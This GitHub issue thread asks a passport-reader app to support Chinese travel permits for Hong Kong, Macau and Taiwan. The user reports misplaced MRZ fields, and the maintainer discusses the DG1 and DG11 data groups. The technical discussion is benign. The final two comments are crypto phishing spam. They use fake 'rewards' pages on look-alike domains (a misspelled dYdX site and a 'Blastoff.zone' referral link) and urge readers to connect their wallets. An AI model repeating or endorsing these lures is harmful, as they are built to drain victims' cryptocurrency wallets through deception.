### ISSUE TITLE
[Feature Request] Add Support for Travel Permit for Mainland Residents to HK, Macau, and Taiwan

### ISSUE THREAD

**Issue by StephDC** [rgex/bondi-androidpassport-reader#7]
The _Travel Permit for Mainland Residents Traveling to and from Hong Kong and Macao SAR_ is a "passport card"-like identification documentation that as its name suggests, a mainland China resident need to use it when traveling to HK and Macao. This card shares a lot of common properties with a regular electronic passport, as it is read by the same machine that reads regular passports, allows cross-border travel, and records visa information with all other info that is needed in a regular passport card.

Another similar card that was issued to Chinese nationals are the _Travel Permit for Mainland Residents Traveling to Taiwan Region_. This permit card is issued by the same government subsidiary and shares similar, if not identical data structure to the permit shown above.

An initial attempt using this app to read the content of such permits gives charming result - The Image and Security information are shown without any issue.

However there is a minor issue regarding the display of the Information section. It seems that although some of the information was read correctly, it did not show those information in the correct space.

The Document type shows CS, which is correct.
The Issued By shows the Document No. instead.
The Document No. shows the name of the card owner.
The Date of Expiry shows something in 2062 in one card, and was left empty in another card - maybe it parses something else as date and failed.
The Gender shows 1 - I am a male so it may be correct, maybe not. I cannot tell.
The Nationality shows AN which seems another piece of Nonsense.
All other fields are shown empty.

Given these information that had been presented in the current status, it seems that only minor effort such as changing the parser for the data read from this card was needed to add the support for such permit.

I wonder if it would be possible for this app to also support these cards, and if there is anything that I could help to add support for them, such as offering a dump of DG1 on these cards (If there is a way to do it on the app it may be another good feature to have).

**Comment by rgex** [comment]
Does the card looks like this?: https://upload.wikimedia.org/wikipedia/commons/0/03/Home_Return_Permit_New_Back.jpg?1577100546241

The DG1 just contains the MRTD text. Like this: IDFRABERTHIER<<<<<<<<<<<<<<<<<<<<<<<\n8806923102858CORINNE<<<<<<<6512068F6

**Comment by StephDC** [comment]
No. The card you mentioned is the permit to allow HK & Macau personnel to visit mainland China and what I am mentioning is another card. In WP as well as official website of HK Immigration Dept, it is called "Exit-Entry Permit for Traveling to and from Hong Kong and Macau"(EEP). The translation I used is what the Certificate Authority of the card reads and I did not realize that the translation is different until I just googled it. However I think this card should be similar to the two cards I mentioned though.

A photo of this card: 

https://upload.wikimedia.org/wikipedia/commons/1/1d/Biometric_Two-way_Permit_%28Front%29.jpg

Although the EEP or whatever is also taking the form of a TD1 card, there is only one single line of the MRTD text on this card. The order of information seems also slightly off, resulting in the app fail to correctly read and fill the information to the view.

**Comment by rgex** [comment]
I see the problem, the MRZ is not a standard one, and it appears not to have the name in it.
It is possible the the name could be in the DG11 see this image:
https://cloud.githubusercontent.com/assets/3996942/19279771/1038bee8-8fe3-11e6-8e2c-d8324b607b41.png

Have tried another passport reader? Did it showed the name correctly?
It would be disturbing to me if the name is not on the chip. This would make the card not be very safe...

**Comment by StephDC** [comment]
I tried ReadID (nl.innovalor.nfciddocshowcase) and it worked fine reading my name out of it.
In that app, the "Full name" shows my name in Chinese, and listed my romanized name in "Other names". According to the schematics you mentioned, it is likely that they did save the name in DG11.

That app however read all dates wrong, showing 6 characters in the field. The Surname is also messed up with some nonsense letters and numbers. I saw my DoB was read out and shown on "Personal Number" but it was also not presented there.

In the Bondi app, I did actually see part of my name on the "Document No." part. Maybe it was just parsed wrong and filled into somewhere else? One of my hypothesis is that the name is present in the DG1 but not all of DG1 is printed on the card - thus the "non-standard MRZ".

If there is any method that I could dump all of the information obtained from there into a file maybe we could figure out what went wrong with this card...

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
